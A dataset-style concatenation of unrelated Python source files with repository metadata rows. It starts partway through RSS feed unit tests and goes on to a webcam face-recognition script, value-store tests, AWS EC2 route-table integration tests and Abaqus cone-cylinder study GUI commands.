url = config.DB_TEST_URL
if not url:
self.skipTest("No database URL set")
engine = sqlalchemy.create_engine(url)
Base.metadata.drop_all(engine)
Base.metadata.create_all(engine)
Session = sessionmaker(bind=engine)
self.session = Session()
feedparser_fake_response = fake_response
def feed_data_dict(self):
data = {
'urls': ['https://news.ycombinator.com/rss'],
'hashtags': '#example',
'twitter': {
'consumer_key': 'XXXXXXXXXXX',
'access_secret': 'XXXXXXXXXXXXXX',
'consumer_secret': 'XXXXXXXXXXXXXX',
'access_key': 'XXXXXXXXXXXX'
},
'name': 'SimpleItRocks'
}
return data
def test_get_twitter_credentials(self):
data = self.feed_data_dict()
feed = FeedSet(data)
keys = feed.twitter_keys
self.assertIsInstance(keys, dict)
self.assertIn('consumer_key', keys)
self.assertIn('access_key', keys)
self.assertIn('consumer_secret', keys)
self.assertIn('access_secret', keys)
def test_urls(self):
data = self.feed_data_dict()
feed = FeedSet(data)
urls = feed.urls
self.assertIsInstance(urls, list)
@unittest.mock.patch('feedparser.parse', return_value=feedparser_fake_response)
def test_save_new_pages(self, feedparser_fake_response):
self.assertEqual(len(self.session.query(RSSContent).all()), 0)
helper = FeedSetHelper(self.session, self.feed_data_dict())
helper.get_pages_from_feeds()
self.assertNotEqual(len(self.session.query(RSSContent).all()), 0)
@unittest.mock.patch('feedparser.parse', return_value=feedparser_fake_response)
def test_not_save_existing_pages(self, feedparser_fake_response):
# presave an item that is present in the retrieved feed, to check if it
# has not been saved after downloading new feeds
entry = fake_response.entries[0]
items_count = len(fake_response.entries)
rsscontent = RSSContent(title=entry.title, url=entry.link)
self.session.add(rsscontent)
self.assertEqual(len(self.session.query(RSSContent).all()), 1)
helper = FeedSetHelper(self.session, self.feed_data_dict())
helper.get_pages_from_feeds()
self.assertEqual(len(self.session.query(RSSContent).all()), items_count, "Entries count has changed")
if __name__ == '__main__':
unittest.main()
| 34.511905 | 109 | 0.660573 | 2,576 | 0.888582 | 0 | 0 | 1,169 | 0.403242 | 0 | 0 | 478 | 0.164884 |
d32237cf61ff2cf5d80f55993554fdb8e42b3f2c | 7,474 | py | Python | src/faceRecognition.py | lizenan/Face-Recognition | b0a7ce630cd93e111ae4b204bc7b466c74084d7d | [
"Unlicense"
] | 3 | 2018-03-01T23:13:10.000Z | 2018-07-10T01:41:55.000Z | src/faceRecognition.py | lizenan/Face-Recognition | b0a7ce630cd93e111ae4b204bc7b466c74084d7d | [
"Unlicense"
] | null | null | null | src/faceRecognition.py | lizenan/Face-Recognition | b0a7ce630cd93e111ae4b204bc7b466c74084d7d | [
"Unlicense"
] | null | null | null | ## -*- coding: utf-8 -*-
"""
Created on Tue Sep 26 13:38:17 2017
@author: Administrator
"""
import dlib
import cv2
import numpy as np
from sklearn.externals import joblib
import os
import pathAttributes
#ap = argparse.ArgumentParser()
#ap.add_argument("-p", "--shape-predictor", metavar="D:\\用户目录\\下载\\shape_predictor_68_face_landmarks.dat\\shape_predictor_68_face_landmarks.dat", required=True,
# help="path to facial landmark predictor")
#ap.add_argument("-r", "--picamera", type=int, default=-1,
#help="whether or not the Raspberry Pi camera should be used")
#args = vars(ap.parse_args())
def faceRecognition():
f = open(pathAttributes.dictionary, 'r')
result = {}
for line in f.readlines():
line = line.strip()
print(line)
if not len(line):
continue
result[line.split(':')[0]] = line.split(':')[1]
f.close()
#face_detection_model = "C:\\Users\\Administrator\\shape_predictor_68_face_landmarks.dat"
#print(result)
print("[INFO] loading facial landmark predictor...")
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor(pathAttributes.face_detection_model)
face_encoder = dlib.face_recognition_model_v1(pathAttributes.face_recognition_model)
print("[INFO] camera sensor warming up...")
#vs = VideoStream().start()
video_capture = cv2.VideoCapture(0) #open camra by calling opencv's function
#time.sleep(2.0)
"""
chris_image = cv2.imread('E:\\49.png')
#chris_image_gray = cv2.cvtColor(chris_image, cv2.COLOR_GRAY2RGB)
chris = detector(chris_image, 1)
chris_shape = predictor(chris_image, chris[0])
chris_face_encoding = face_encoder.compute_face_descriptor(chris_image, chris_shape, 1)
print("Chris:"+str(chris_face_encoding))
julie_image = cv2.imread('E:\\1.png')
#julie_image_gray = cv2.cvtColor(julie_image, cv2.COLOR_GRAY2RGB)
julie = detector(julie_image, 1)
julie_shape = predictor(julie_image, julie[0])
julie_face_encoding = face_encoder.compute_face_descriptor(julie_image, julie_shape, 1)
print("JULIE:"+str(julie_face_encoding))
"""
face_locations = []
face_encodings = []
face_names = []
raw_list = []
while True:
raw_list = []
face_names = []
# grab the frame from the threaded video stream, resize it to
# have a maximum width of 400 pixels, and convert it to
# grayscale
#frame = vs.read()
#frame = imutils.resize(frame, width=400)
ret, frame = video_capture.read()
#dim = (int(frame.shape[1] * 0.25), int(frame.shape[0] * 0.25))
dim = (int(frame.shape[1] * 0.2), int(frame.shape[0] * 0.2))
small_frame = cv2.resize(frame, dim)
gray_one_channel = cv2.cvtColor(small_frame, cv2.COLOR_BGR2GRAY)
#face_locations = face_recognition.face_locations(small_frame)
gray = cv2.cvtColor(gray_one_channel, cv2.COLOR_GRAY2RGB)
# detect faces in the grayscale frame
rects = detector(gray, 1)
#print("rects:"+str(rects))
for rect in rects:
#print("rect:"+str(rect))
css = [rect.top(), rect.right(), rect.bottom(), rect.left()]
location = max(css[0], 0), min(css[1], gray.shape[1]), min(css[2], gray.shape[0]), max(css[3], 0)
face_location = dlib.rectangle(location[3], location[0], location[1], location[2])
face_locations.append(face_location)
raw_list.append(css)
shape = predictor(gray, face_location)
face_encoding = face_encoder.compute_face_descriptor(gray, shape, 1)
#print("random:"+str(face_encoding))
"""
match_chris = []
match_julie = []
chris_norm = 0
julie_norm = 0
if len([chris_face_encoding]) == 0:
match_chris = list(0<=0.6)
else:
chris_norm = np.linalg.norm(np.array([chris_face_encoding]) - np.array([face_encoding]), axis=1)
match_chris = list(chris_norm<= 0.6)
print("chris:"+str(chris_norm))
name = "Unknown"
if len([julie_face_encoding]) == 0:
match_julie = list(0<=0.6)
else:
julie_norm = np.linalg.norm(np.array([julie_face_encoding]) - np.array([face_encoding]), axis=1)
match_julie = list(julie_norm <= 0.6)
print("julie:"+str(julie_norm))
if match_chris[0]!=0 and match_julie[0]!=0:
if julie_norm>chris_norm:
name = "Chris"
else:
name = "Julie"
elif match_julie[0] == 0 and match_chris[0] !=0:
name = "Chris"
elif match_julie[0] != 0 and match_chris[0] ==0:
name = "Julie"
else:
name = "Unknown"
"""
threshold = -0.05 #-0.1 for C=0.1 4-8 6 for 0.3
proba = 0.72
clf = joblib.load(pathAttributes.SVM_model)
feeaturesArray = np.array(face_encoding)
ID = clf.predict(feeaturesArray.reshape(1,-1))[0]
name = result[str(ID)]
#scores = clf.decision_function(feeaturesArray.reshape(1,-1))
scores = clf.predict_proba(feeaturesArray.reshape(1,-1))
"""
scores_sorted = np.sort(scores)
second_biggest = scores_sorted[0][-2]
minimum = scores_sorted[0][0]
biggest_score = np.max(scores)
gap = biggest_score - minimum
gap_2 = biggest_score - second_biggest
print(gap_2)
percentage = gap_2/gap *100
print(percentage)
if percentage < 30:
name = "unknown"
""" """
biggest_score = np.max(scores)
if biggest_score < threshold:
name = "unknown"
"""
biggest_score = np.max(scores)
if biggest_score < proba:
name="unknown"
#scores = scores - np.min(scores)
#scores = scores/np.max(scores)
print(scores,name)
face_names.append(name)
#print(face_names)
for (top, right, bottom, left), name in zip(raw_list, face_names):
# Scale back up face locations since the frame we detected in was scaled to 1/4 size
top *= 5
right *= 5
bottom *= 5
left *= 5
# Draw a box around the faceq
cv2.rectangle(frame, (left-10, top-10), (right+10, bottom+10), (0, 0, 255), 2)
# Draw a label with a name below the face
cv2.rectangle(frame, (left-10, bottom+10), (right+10, bottom+45), (0, 0, 255), cv2.FILLED)
font = cv2.FONT_HERSHEY_DUPLEX
cv2.putText(frame, name, (left, bottom + 30), font, 1.0, (255, 255, 255), 1)
cv2.imshow('Video', frame) #display the camra
# Hit 'q' on the keyboard to quit!
if cv2.waitKey(1) & 0xFF == ord('q'):
break
video_capture.release()
cv2.destroyAllWindows()
faceRecognition()
| 42.225989 | 161 | 0.561012 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4,205 | 0.561715 |
d322674711a217f72d8fe05d49c286ff43b55845 | 1,005 | py | Python | tests/contrib/value_learning/_test_valuestore.py | spirali/gamegym | 8c2dbb7969cabae9ca86c0dab74c6ddc5fbd21bf | [
"MIT"
] | 49 | 2018-10-05T20:52:31.000Z | 2021-12-29T05:59:27.000Z | tests/contrib/value_learning/_test_valuestore.py | spirali/gamegym | 8c2dbb7969cabae9ca86c0dab74c6ddc5fbd21bf | [
"MIT"
] | 8 | 2018-10-07T12:11:20.000Z | 2019-02-03T10:47:25.000Z | tests/contrib/value_learning/_test_valuestore.py | spirali/gamegym | 8c2dbb7969cabae9ca86c0dab74c6ddc5fbd21bf | [
"MIT"
] | 4 | 2018-10-07T10:27:43.000Z | 2020-02-13T18:47:37.000Z | from gamegym.game import Game, Situation
from gamegym.utils import get_rng
from gamegym.distribution import Explicit
from gamegym.value_learning.valuestore import LinearValueStore
import numpy as np
import pytest
from scipy.sparse import csr_matrix
def test_init():
LinearValueStore(shape=(3, 3))
LinearValueStore(np.zeros((4, 3)))
LinearValueStore(np.zeros((4, 3)), shape=(4, 3))
with pytest.raises(Exception):
LinearValueStore((3, 3))
with pytest.raises(Exception):
LinearValueStore(np.zeros((4, 3)), shape=(4, 4))
def test_value_update():
a = np.ones((4, ))
vs = LinearValueStore(a)
f = [0, 2, -1, 3]
assert vs.get(f) == pytest.approx(4.0)
assert vs.get(np.array(f)) == pytest.approx(4.0)
#assert vs.get(csr_matrix(f)) == pytest.approx(4.0)
vs.update(f, -0.5)
assert vs.values == pytest.approx([1, 0, 1.5, -0.5])
assert vs.get(f) == pytest.approx(-3.0)
def test_norm():
vs = LinearValueStore(shape=(2, 3), fix_mean=1.0)
| 29.558824 | 62 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 51 | 0.050746 |
d322a549ba04d5714d8f4cb616bd1bf2addd3df6 | 9,951 | py | Python | test/e2e/tests/test_route_table.py | timbyr/ec2-controller | d96d056fdc6ec7d31981f4c14cad8d740f6cf6ec | [
"Apache-2.0"
] | 14 | 2021-08-04T00:21:49.000Z | 2022-03-21T01:06:09.000Z | test/e2e/tests/test_route_table.py | timbyr/ec2-controller | d96d056fdc6ec7d31981f4c14cad8d740f6cf6ec | [
"Apache-2.0"
] | 48 | 2021-08-03T19:00:42.000Z | 2022-03-31T22:18:42.000Z | test/e2e/tests/test_route_table.py | timbyr/ec2-controller | d96d056fdc6ec7d31981f4c14cad8d740f6cf6ec | [
"Apache-2.0"
] | 9 | 2021-07-22T15:49:43.000Z | 2022-03-06T22:24:14.000Z | # Copyright Amazon.com Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may
# not use this file except in compliance with the License. A copy of the
# License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
"""Integration tests for the RouteTable API.
"""
import pytest
import time
import logging
from acktest.resources import random_suffix_name
from acktest.k8s import resource as k8s
from e2e import service_marker, CRD_GROUP, CRD_VERSION, load_ec2_resource
from e2e.replacement_values import REPLACEMENT_VALUES
from e2e.bootstrap_resources import get_bootstrap_resources
RESOURCE_PLURAL = "routetables"
DEFAULT_WAIT_AFTER_SECONDS = 5
CREATE_WAIT_AFTER_SECONDS = 10
DELETE_WAIT_AFTER_SECONDS = 10
def get_route_table(ec2_client, route_table_id: str) -> dict:
try:
resp = ec2_client.describe_route_tables(
Filters=[{"Name": "route-table-id", "Values": [route_table_id]}]
)
except Exception as e:
logging.debug(e)
return None
if len(resp["RouteTables"]) == 0:
return None
return resp["RouteTables"][0]
def route_table_exists(ec2_client, route_table_id: str) -> bool:
return get_route_table(ec2_client, route_table_id) is not None
def get_routes(ec2_client, route_table_id: str) -> list:
try:
resp = ec2_client.describe_route_tables(
Filters=[{"Name": "route-table-id", "Values": [route_table_id]}]
)
except Exception as e:
logging.debug(e)
return None
if len(resp["RouteTables"]) == 0:
return None
return resp["RouteTables"][0]["Routes"]
def route_exists(ec2_client, route_table_id: str, gateway_id: str, origin: str) -> bool:
routes = get_routes(ec2_client, route_table_id)
for route in routes:
if route["Origin"] == origin and route["GatewayId"] == gateway_id:
return True
return False
@service_marker
@pytest.mark.canary
class TestRouteTable:
def test_create_delete(self, ec2_client):
test_resource_values = REPLACEMENT_VALUES.copy()
resource_name = random_suffix_name("route-table-test", 24)
test_vpc = get_bootstrap_resources().SharedTestVPC
vpc_id = test_vpc.vpc_id
igw_id = test_vpc.public_subnets.route_table.internet_gateway.internet_gateway_id
test_cidr_block = "192.168.0.0/24"
test_resource_values["ROUTE_TABLE_NAME"] = resource_name
test_resource_values["VPC_ID"] = vpc_id
test_resource_values["IGW_ID"] = igw_id
test_resource_values["DEST_CIDR_BLOCK"] = test_cidr_block
# Load Route Table CR
resource_data = load_ec2_resource(
"route_table",
additional_replacements=test_resource_values,
)
logging.debug(resource_data)
# Create k8s resource
ref = k8s.CustomResourceReference(
CRD_GROUP, CRD_VERSION, RESOURCE_PLURAL,
resource_name, namespace="default",
)
k8s.create_custom_resource(ref, resource_data)
cr = k8s.wait_resource_consumed_by_controller(ref)
assert cr is not None
assert k8s.get_resource_exists(ref)
resource = k8s.get_resource(ref)
resource_id = resource["status"]["routeTableID"]
time.sleep(CREATE_WAIT_AFTER_SECONDS)
# Check Route Table exists
assert route_table_exists(ec2_client, resource_id)
# Delete k8s resource
_, deleted = k8s.delete_custom_resource(ref)
assert deleted is True
time.sleep(DELETE_WAIT_AFTER_SECONDS)
# Check Route Table doesn't exist
exists = route_table_exists(ec2_client, resource_id)
assert not exists
def test_terminal_condition(self):
test_resource_values = REPLACEMENT_VALUES.copy()
resource_name = random_suffix_name("route-table-fail", 24)
test_resource_values["ROUTE_TABLE_NAME"] = resource_name
test_resource_values["VPC_ID"] = "InvalidVpcId"
# Load RouteTable CR
resource_data = load_ec2_resource(
"route_table",
additional_replacements=test_resource_values,
)
logging.debug(resource_data)
# Create k8s resource
ref = k8s.CustomResourceReference(
CRD_GROUP, CRD_VERSION, RESOURCE_PLURAL,
resource_name, namespace="default",
)
k8s.create_custom_resource(ref, resource_data)
cr = k8s.wait_resource_consumed_by_controller(ref)
assert cr is not None
assert k8s.get_resource_exists(ref)
expected_msg = "InvalidVpcID.NotFound: The vpc ID 'InvalidVpcId' does not exist"
terminal_condition = k8s.get_resource_condition(ref, "ACK.Terminal")
# Example condition message:
# InvalidVpcID.NotFound: The vpc ID 'InvalidVpcId' does not exist
# status code: 400, request id: 5801fc80-67cf-465f-8b83-5e02d517d554
# This check only verifies the error message; the request hash is irrelevant and therefore can be ignored.
assert expected_msg in terminal_condition['message']
def test_crud_route(self, ec2_client):
test_resource_values = REPLACEMENT_VALUES.copy()
resource_name = random_suffix_name("route-table-test", 24)
test_vpc = get_bootstrap_resources().SharedTestVPC
vpc_id = test_vpc.vpc_id
igw_id = test_vpc.public_subnets.route_table.internet_gateway.internet_gateway_id
test_cidr_block = "192.168.0.0/24"
test_resource_values["ROUTE_TABLE_NAME"] = resource_name
test_resource_values["VPC_ID"] = vpc_id
test_resource_values["IGW_ID"] = igw_id
test_resource_values["DEST_CIDR_BLOCK"] = test_cidr_block
# Load Route Table CR
resource_data = load_ec2_resource(
"route_table",
additional_replacements=test_resource_values,
)
logging.debug(resource_data)
# Create Route Table
ref = k8s.CustomResourceReference(
CRD_GROUP, CRD_VERSION, RESOURCE_PLURAL,
resource_name, namespace="default",
)
k8s.create_custom_resource(ref, resource_data)
cr = k8s.wait_resource_consumed_by_controller(ref)
assert cr is not None
assert k8s.get_resource_exists(ref)
resource = k8s.get_resource(ref)
resource_id = resource["status"]["routeTableID"]
time.sleep(CREATE_WAIT_AFTER_SECONDS)
# Check Route Table exists
assert route_table_exists(ec2_client, resource_id)
# Check Routes exist (default and desired)
routes = get_routes(ec2_client, resource_id)
for route in routes:
if route["GatewayId"] == "local":
default_cidr = route["DestinationCidrBlock"]
assert route["Origin"] == "CreateRouteTable"
elif route["GatewayId"] == igw_id:
assert route["Origin"] == "CreateRoute"
else:
assert False
# Update Route
updated_cidr = "192.168.1.0/24"
patch = {"spec": {"routes": [
{
#Default route cannot be changed
"destinationCIDRBlock": default_cidr,
"gatewayID": "local"
},
{
"destinationCIDRBlock": updated_cidr,
"gatewayID": igw_id
}
]
}
}
_ = k8s.patch_custom_resource(ref, patch)
time.sleep(DEFAULT_WAIT_AFTER_SECONDS)
# assert patched state
resource = k8s.get_resource(ref)
assert len(resource['status']['routeStatuses']) == 2
for route in resource['status']['routeStatuses']:
if route["gatewayID"] == "local":
assert route_exists(ec2_client, resource_id, "local", "CreateRouteTable")
elif route["gatewayID"] == igw_id:
# origin and state are set server-side
assert route_exists(ec2_client, resource_id, igw_id, "CreateRoute")
assert route["state"] == "active"
else:
assert False
# Delete Route
patch = {"spec": {"routes": [
{
"destinationCIDRBlock": default_cidr,
"gatewayID": "local"
}
]
}
}
_ = k8s.patch_custom_resource(ref, patch)
time.sleep(DEFAULT_WAIT_AFTER_SECONDS)
resource = k8s.get_resource(ref)
assert len(resource['spec']['routes']) == 1
for route in resource['spec']['routes']:
if route["gatewayID"] == "local":
assert route_exists(ec2_client, resource_id, "local", "CreateRouteTable")
else:
assert False
# Should not be able to delete default route
patch = {"spec": {"routes": [
]
}
}
_ = k8s.patch_custom_resource(ref, patch)
time.sleep(DEFAULT_WAIT_AFTER_SECONDS)
expected_msg = "InvalidParameterValue: cannot remove local route"
terminal_condition = k8s.get_resource_condition(ref, "ACK.Terminal")
assert expected_msg in terminal_condition['message']
# Delete Route Table
_, deleted = k8s.delete_custom_resource(ref)
assert deleted is True
time.sleep(DELETE_WAIT_AFTER_SECONDS)
# Check Route Table doesn't exist
exists = route_table_exists(ec2_client, resource_id)
assert not exists | 35.794964 | 114 | 0.638428 | 7,691 | 0.772887 | 0 | 0 | 7,727 | 0.776505 | 0 | 0 | 2,472 | 0.248417 |
d322e920e430d42433aea1129d02e77e626557b0 | 21,922 | py | Python | desicos/abaqus/gui/gui_commands.py | saullocastro/desicos | 922db8ac4fb0fb4d09df18ce2a14011f207f6fa8 | [
"BSD-3-Clause"
] | 1 | 2020-10-22T22:15:24.000Z | 2020-10-22T22:15:24.000Z | desicos/abaqus/gui/gui_commands.py | saullocastro/desicos | 922db8ac4fb0fb4d09df18ce2a14011f207f6fa8 | [
"BSD-3-Clause"
] | 1 | 2020-10-09T12:42:02.000Z | 2020-10-09T12:42:02.000Z | desicos/abaqus/gui/gui_commands.py | saullocastro/desicos | 922db8ac4fb0fb4d09df18ce2a14011f207f6fa8 | [
"BSD-3-Clause"
] | 2 | 2020-07-14T07:45:31.000Z | 2020-12-29T00:22:41.000Z | import os
import subprocess
import shutil
from itertools import chain
import __main__
import numpy as np
import desicos.abaqus.abaqus_functions as abaqus_functions
import desicos.conecylDB as conecylDB
import desicos.abaqus.conecyl as conecyl
import desicos.abaqus.study as study
from desicos.abaqus.constants import TMP_DIR
from desicos.conecylDB import fetch, save
ccattrs = ['rbot','H','alphadeg','plyts',
'stack', 'numel_r', 'elem_type',
'separate_load_steps', 'displ_controlled',
'axial_displ', 'axial_load', 'axial_step',
'pressure_load', 'pressure_step',
#'Nxxtop', 'Nxxtop_vec',
'damping_factor1', 'minInc1', 'initialInc1', 'maxInc1', 'maxNumInc1',
'damping_factor2', 'minInc2', 'initialInc2', 'maxInc2', 'maxNumInc2',
'bc_fix_bottom_uR', 'bc_fix_bottom_v', 'bc_bottom_clamped',
'bc_fix_bottom_side_uR', 'bc_fix_bottom_side_v', 'bc_fix_bottom_side_u3',
'bc_fix_top_uR', 'bc_fix_top_v', 'bc_top_clamped',
'bc_fix_top_side_uR', 'bc_fix_top_side_v', 'bc_fix_top_side_u3',
'resin_add_BIR', 'resin_add_BOR', 'resin_add_TIR', 'resin_add_TOR',
'use_DLR_bc',
'resin_E', 'resin_nu', 'resin_numel',
'resin_bot_h', 'resin_bir_w1', 'resin_bir_w2', 'resin_bor_w1', 'resin_bor_w2',
'resin_top_h', 'resin_tir_w1', 'resin_tir_w2', 'resin_tor_w1', 'resin_tor_w2',
'laminapropKeys', 'allowables', 'timeInterval', 'stress_output']
def find_std_name(std_name):
#
#TODO: avoid using try and except... how to find if .stds exists inside
# __main__
try:
if std_name in __main__.stds.keys():
pass
except:
__main__.stds = {}
return std_name
def command_wrapper(cmd):
# Decorator function to provide error tracebacks from commands
def new_cmd(*args, **kwargs):
try:
cmd(*args, **kwargs)
except Exception, e:
import traceback
traceback.print_exc()
raise
return new_cmd
@command_wrapper
def apply_imp_ms(
std_name,
imp_ms,
imp_ms_stretch_H,
imp_ms_scalings,
imp_r_TOL,
imp_ms_ncp,
imp_ms_power_parameter,
imp_ms_theta_z_format,
imp_ms_rotatedeg,
):
std = __main__.stds[std_name]
start = 0
if std.calc_Pcr:
start = 1
# The nodal_translations stores the first search to save time
# it starts with None
nodal_translations = None
for i, scaling_factor in enumerate(imp_ms_scalings):
scaling_factor = scaling_factor[0]
if scaling_factor:
cc = std.ccs[i+start]
msi = cc.impconf.add_msi(
imp_ms=imp_ms,
scaling_factor=scaling_factor,
rotatedeg=imp_ms_rotatedeg,
)
cc.impconf.rebuild()
msi.stretch_H = imp_ms_stretch_H
msi.use_theta_z_format = imp_ms_theta_z_format
msi.r_TOL = imp_r_TOL
msi.ncp = imp_ms_ncp
msi.power_parameter = imp_ms_power_parameter
msi.nodal_translations = nodal_translations
nodal_translations = msi.create()
@command_wrapper
def apply_imp_t(
std_name,
imp_thick,
imp_num_sets,
imp_t_stretch_H,
imp_t_scalings,
imp_t_ncp,
imp_t_power_parameter,
imp_t_theta_z_format,
imp_t_rotatedeg):
std = __main__.stds[std_name]
start = 0
if std.calc_Pcr:
start = 1
# The nodal_translations stores the first search to save time
# it starts with None
elems_t = None
t_set = None
for i,scaling_factor in enumerate(imp_t_scalings):
scaling_factor = scaling_factor[0]
if scaling_factor:
cc = std.ccs[i+start]
ti = cc.impconf.add_ti(imp_thick, scaling_factor)
cc.impconf.rebuild()
ti.number_of_sets = imp_num_sets
ti.stretch_H = imp_t_stretch_H
ti.use_theta_z_format = imp_t_theta_z_format
ti.ncp = imp_t_ncp
ti.power_parameter = imp_t_power_parameter
ti.elems_t = elems_t
ti.t_set = t_set
elems_t, t_set = ti.create()
def create_study(**kwargs):
# setting defaults
pl_table = kwargs.get('pl_table')
cb_table = kwargs.get('cb_table')
pload_step = kwargs.get('pload_step')
d_table = kwargs.get('d_table')
ax_table = kwargs.get('ax_table')
lbmi_table = kwargs.get('lbmi_table')
cut_table = kwargs.get('cut_table')
ppi_enabled = kwargs.get('ppi_enabled')
ppi_extra_height = kwargs.get('ppi_extra_height')
ppi_table = kwargs.get('ppi_table')
ffi_scalings = kwargs.get('ffi_scalings')
while len(ffi_scalings) > 0 and ffi_scalings[-1] in [(0, False), False]:
ffi_scalings = ffi_scalings[:-1]
betadeg = kwargs.get('betadeg', 0.)
omegadeg = kwargs.get('omegadeg', 0.)
betadegs = kwargs.get('betadegs')
omegadegs = kwargs.get('omegadegs')
imp_num = {}
imp_num['pl'] = kwargs.get('pl_num')
imp_num['cbi'] = kwargs.get('cb_num')
imp_num['d'] = kwargs.get('d_num')
imp_num['ax'] = kwargs.get('ax_num')
imp_num['lbmi'] = kwargs.get('lbmi_num')
imp_num['cut'] = kwargs.get('cut_num')
imp_tables = {}
imp_tables['pl'] = pl_table
imp_tables['cbi'] = cb_table
imp_tables['d'] = d_table
imp_tables['ax'] = ax_table
imp_tables['lbmi'] = lbmi_table
imp_tables['cut'] = cut_table
num_params = {}
num_params['pl'] = 2
num_params['cbi'] = 2
num_params['d'] = 4
num_params['ax'] = 2
num_params['lbmi'] = 1
num_params['cut'] = 3
num_models = 1
for k in ['pl', 'cbi', 'd', 'ax', 'lbmi', 'cut']:
if imp_num[k] == 0:
continue
imp_table = imp_tables[k]
num_models = max(num_models, len(imp_table)-(num_params[k]+1))
num_models = max(num_models, len(ffi_scalings))
#
# Cleaning up input values
#
# laminate
laminate = np.atleast_2d([i for i in kwargs.get('laminate') if i])
kwargs['laminate'] = laminate
kwargs['stack'] = [float(i) for i in laminate[:,2] if i != '']
stack = kwargs['stack']
kwargs['laminapropKeys'] = [i if i != '' else laminate[0,0]
for i in laminate[:len(stack),0]]
kwargs['plyts'] = [float(i) if i != '' else float(laminate[0,1])
for i in laminate[:len(stack),1]]
#TODO currently only one allowable is allowed for stress analysis
kwargs['allowables'] = [kwargs['allowables'] for _ in stack]
#allowablesKeys = [float(i) if i != '' else laminate[0,3] \
# for i in laminate[:len(stack),1]]
#
# load asymmetry
#
#TODO list comprehension for these guys below
la = kwargs.get('la')
if la == 0:
betadegs = []
omegadegs = []
elif la == 1:
betadegs = [betadeg for i in range(num_models)]
omegadegs = [omegadeg for i in range(num_models)]
elif la == 2:
if betadegs is not None:
new_betadegs = []
for betadeg in betadegs:
if betadeg:
new_betadegs.append(betadeg[0])
betadegs = new_betadegs
else:
betadegs = []
if omegadegs is not None:
new_omegadegs = []
for omegadeg in omegadegs:
if omegadeg:
new_omegadegs.append(omegadeg[0])
omegadegs = new_omegadegs
else:
omegadegs = []
num_models = max(num_models, len(betadegs), len(omegadegs))
#
# damping
#
if not kwargs['artificial_damping1']:
kwargs['damping_factor1'] = None
if not kwargs['artificial_damping2']:
kwargs['damping_factor2'] = None
#
std_name = find_std_name(kwargs.get('std_name'))
#
dirname = os.path.join(TMP_DIR, std_name, 'outputs')
if not os.path.isdir(dirname):
os.makedirs(dirname)
#
#
std = study.Study()
__main__.stds[std_name] = std
std.name = std_name
std.rebuild()
for cc in std.ccs:
cc.rebuilt = False
cc.created_model = False
for i in range(1, num_models+1):
cc = conecyl.ConeCyl()
for attr in ccattrs:
setattr(cc, attr, kwargs[attr])
# adding load asymmetry
i_model = i-1
if i_model < len(betadegs):
cc.betadeg = betadegs[i_model]
if i_model < len(omegadegs):
cc.omegadeg = omegadegs[i_model]
# adding perturbation loads
i_model = i + num_params['pl']
if i_model < len(pl_table):
for j in range(imp_num['pl']):
theta = pl_table[0][j]
pt = pl_table[1][j]
pltotal = pl_table[i_model][j]
cc.impconf.add_pload(theta, pt, pltotal, step=pload_step)
#Adding constant buckle
i_model = i + num_params['cbi']
if i_model < len(cb_table):
for j in range(imp_num['cbi']):
theta = cb_table[0][j]
pt = cb_table[1][j]
cbtotal = cb_table[i_model][j]
cc.impconf.add_cb(theta, pt, cbtotal, step=pload_step)
# adding single buckles
i_model = i + num_params['d']
if i_model < len(d_table):
for j in range(imp_num['d']):
theta0 = d_table[0][j]
z0 = d_table[1][j]
a = d_table[2][j]
b = d_table[3][j]
wb = d_table[i_model][j]
cc.impconf.add_dimple(theta0, z0, a, b, wb)
# adding axisymmetrics
i_model = i + num_params['ax']
if i_model < len(ax_table):
for j in range(imp_num['ax']):
z0 = ax_table[0][j]
b = ax_table[1][j]
wb = ax_table[i_model][j]
cc.impconf.add_axisymmetric(z0, b, wb)
# adding linear buckling mode-shaped imperfections
i_model = i + num_params['lbmi']
if i_model < len(lbmi_table):
for j in range(imp_num['lbmi']):
mode = lbmi_table[0][j]
scaling_factor = lbmi_table[i_model][j]
cc.impconf.add_lbmi(mode, scaling_factor)
# adding cutouts
i_model = i + num_params['cut']
if i_model < len(cut_table):
for j in range(imp_num['cut']):
theta = cut_table[0][j]
pt = cut_table[1][j]
numel = cut_table[2][j]
d = cut_table[i_model][j]
cutout = cc.impconf.add_cutout(theta, pt, d,
numel_radial_edge=numel)
## adding ply piece imperfection
if ppi_enabled:
info = []
for row in ppi_table:
if row is False:
continue # False may be appended if there is only one row
keys = ['starting_position', 'rel_ang_offset', 'max_width', 'eccentricity']
try:
info.append(dict((key, float(row[i])) for i, key in enumerate(keys) if row[i] != ''))
except ValueError, e:
raise ValueError('Invalid non-numeric value in Ply Piece Imperfection table:' + e.message.split(':')[-1])
cc.impconf.add_ppi(info, ppi_extra_height)
# adding fiber fraction imperfection
i_model = i-1
if i_model < len(ffi_scalings):
global_sf, use_ti = ffi_scalings[i_model]
if global_sf == 0:
global_sf = None
if use_ti or (global_sf is not None):
cc.impconf.add_ffi(nominal_vf=kwargs['ffi_nominal_vf'],
E_matrix=kwargs['ffi_E_matrix'],
nu_matrix=kwargs['ffi_nu_matrix'],
use_ti=use_ti,
global_sf=global_sf)
std.add_cc(cc)
std.create_models(write_input_files=False)
def run_study(std_name, ncpus, use_job_stopper):
args = ['abaqus', 'python']
args.append(os.path.join(TMP_DIR, std_name,
'run_' + std_name + '.py'))
args.append('cpus={0:d}'.format(ncpus))
args.append('gui')
if use_job_stopper:
args.append('use_stopper')
run_cmd = ' '.join(args)
subprocess.Popen(run_cmd, shell=True)
def clean_output_folder(std_name):
stds = __main__.stds
if not std_name in stds.keys():
print('Study has not been created!')
print('')
return
std = stds[std_name]
cwd = os.getcwd()
os.chdir(std.output_dir)
try:
if os.name == 'nt':
os.system('move *.gaps ..')
os.system('del /q *.*')
os.system('move ..\*.gaps .')
else:
os.system('mv *.gaps ..')
os.system('rm *.*')
os.system('mv ..\*.gaps .')
except:
pass
os.chdir(cwd)
def save_study(std_name, params_from_gui):
stds = __main__.stds
if not std_name in stds.keys():
print('Study has not been created!')
print(' ')
return
std = stds[std_name]
std.params_from_gui = params_from_gui
std.save()
if not os.path.isdir(TMP_DIR):
os.makedirs(TMP_DIR)
os.chdir(TMP_DIR)
